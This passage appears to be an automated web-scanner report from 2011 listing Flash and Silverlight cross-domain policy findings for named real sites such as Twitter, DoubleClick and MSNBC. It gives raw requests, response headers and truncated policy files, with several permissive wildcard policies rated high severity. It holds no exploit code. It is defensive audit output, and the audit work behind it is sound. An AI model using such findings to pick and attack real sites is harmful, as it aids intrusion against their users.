<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="dev.livescience.com" />
...[SNIP]...
<allow-access-from domain="staging.livescience.com" />
<allow-access-from domain="livescience.com" />
<allow-access-from domain="dev.newsarama.com" />
<allow-access-from domain="www.newsarama.com" />
<allow-access-from domain="staging.newsarama.com" />
<allow-access-from domain="newsarama.com" />
<allow-access-from domain="dev.aviation.com" />
<allow-access-from domain="www.aviation.com" />
<allow-access-from domain="aviation.com" />
<allow-access-from domain="dev.space.com" />
<allow-access-from domain="www.space.com" />
<allow-access-from domain="space.com" />
...[SNIP]...

6.105. http://www.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:38 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1296357578943403; path=/; expires=Sun, 06-Feb-11 03:19:38 GMT; domain=.twitter.com
Last-Modified: Sat, 29 Jan 2011 02:47:24 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 30 Jan 2011 03:49:38 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
   <allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

7. Silverlight cross-domain policy
There are 26 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.ae.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.ae.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.ae.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 14:50:55 GMT
Date: Sun, 30 Jan 2011 14:48:18 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.rad.redacted/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.rad.redacted
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.rad.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 01:07:24 GMT
Accept-Ranges: bytes
ETag: "02ee18f7b9cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:40:48 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

7.3. http://b.voicefive.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 31 Jan 2011 01:40:59 GMT
Date: Sun, 30 Jan 2011 01:40:59 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.4. http://ec.redcated/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.redcated
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ec.redcated

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Age: 134956
Date: Sun, 30 Jan 2011 02:08:12 GMT
Expires: Fri, 04 Feb 2011 12:38:56 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.5. http://jp.video.redacted/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://jp.video.redacted
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: jp.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Last-Modified: Sun, 22 Jun 2008 10:46:32 GMT
Accept-Ranges: bytes
ETag: "0f4c23b55d4c81:17d2"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:08 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.6. http://latino.aol.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://latino.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: latino.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:10 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=67
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.7. http://latino.video.redacted/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://latino.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: latino.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Last-Modified: Sun, 22 Jun 2008 10:46:32 GMT
Accept-Ranges: bytes
ETag: "0f4c23b55d4c81:17d2"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:12 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.8. http://netscape.aol.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://netscape.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: netscape.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.9. http://ninemsn.video.redacted/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ninemsn.video.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ninemsn.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Last-Modified: Sun, 22 Jun 2008 10:46:32 GMT
Accept-Ranges: bytes
ETag: "0f4c23b55d4c81:17d2"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:21 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.10. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 29 Jan 2011 05:52:40 GMT
Expires: Sun, 30 Jan 2011 05:52:40 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 73554

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.11. http://wrapper.g.redacted/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wrapper.g.redacted
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wrapper.g.redacted

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 29 Sep 2009 20:48:24 GMT
Accept-Ranges: bytes
ETag: "1d441304641ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:52:07 GMT
Connection: close
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

7.12. http://www.ticketcity.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ticketcity.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.ticketcity.com

Response

HTTP/1.1 200 OK
Content-Length: 339
Content-Type: text/xml
Last-Modified: Thu, 22 Jul 2010 14:19:57 GMT
Accept-Ranges: bytes
ETag: "a58098f6a829cb1:1713"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:03:48 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

7.13. http://blstj.redacted/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blstj.redacted
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: blstj.redacted

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Mon, 22 Jun 2009 18:26:44 GMT
Accept-Ranges: bytes
ETag: "08a92fe66f3c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
S: BLUMPPSTCA03
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:41:05 GMT
Content-Length: 400
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*.redacted" />
<domain uri="http://*.msn-int.com" />
...[SNIP]...

7.14. http://dateline.msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dateline.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dateline.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:03 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.15. http://explore.live.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://explore.live.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: explore.live.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 08 Dec 2010 19:39:30 GMT
Accept-Ranges: bytes
ETag: "c13adea1f97cb1:0"
Vary: Accept-Language,Cookie,Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:16 GMT
Connection: close
Content-Length: 492

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">

<domain uri="http://windows.microsoft.com"/><domain uri="http://*.windows.microsoft.com"/>
...[SNIP]...
<domain uri="http://*.explore.live.com"/>
...[SNIP]...

7.16. http://hardball.msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hardball.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: hardball.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:22 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.17. http://msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:23 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.18. http://msnbcmedia.redacted/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msnbcmedia.redacted
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: msnbcmedia.redacted

Response

HTTP/1.1 200 OK
Content-Type: text/xml
ETag: "8066f4feb3aecb1:243"
Last-Modified: Fri, 07 Jan 2011 21:44:01 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:31 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.19. http://mtp.msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mtp.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mtp.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "04f15705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:52 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.20. http://nbcsports.msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nbcsports.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nbcsports.msnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "04f15705474ca1:25b"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-Cnection: close
Content-Length: 533
Cache-Control: public, max-age=60
Expires: Sun, 30 Jan 2011 02:18:06 GMT
Date: Sun, 30 Jan 2011 02:17:06 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.21. http://nightly.msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nightly.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nightly.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "04f15705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:18 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.22. http://rachel.msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rachel.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rachel.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "04f15705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:18:13 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.23. http://today.msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://today.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: today.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:56:39 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

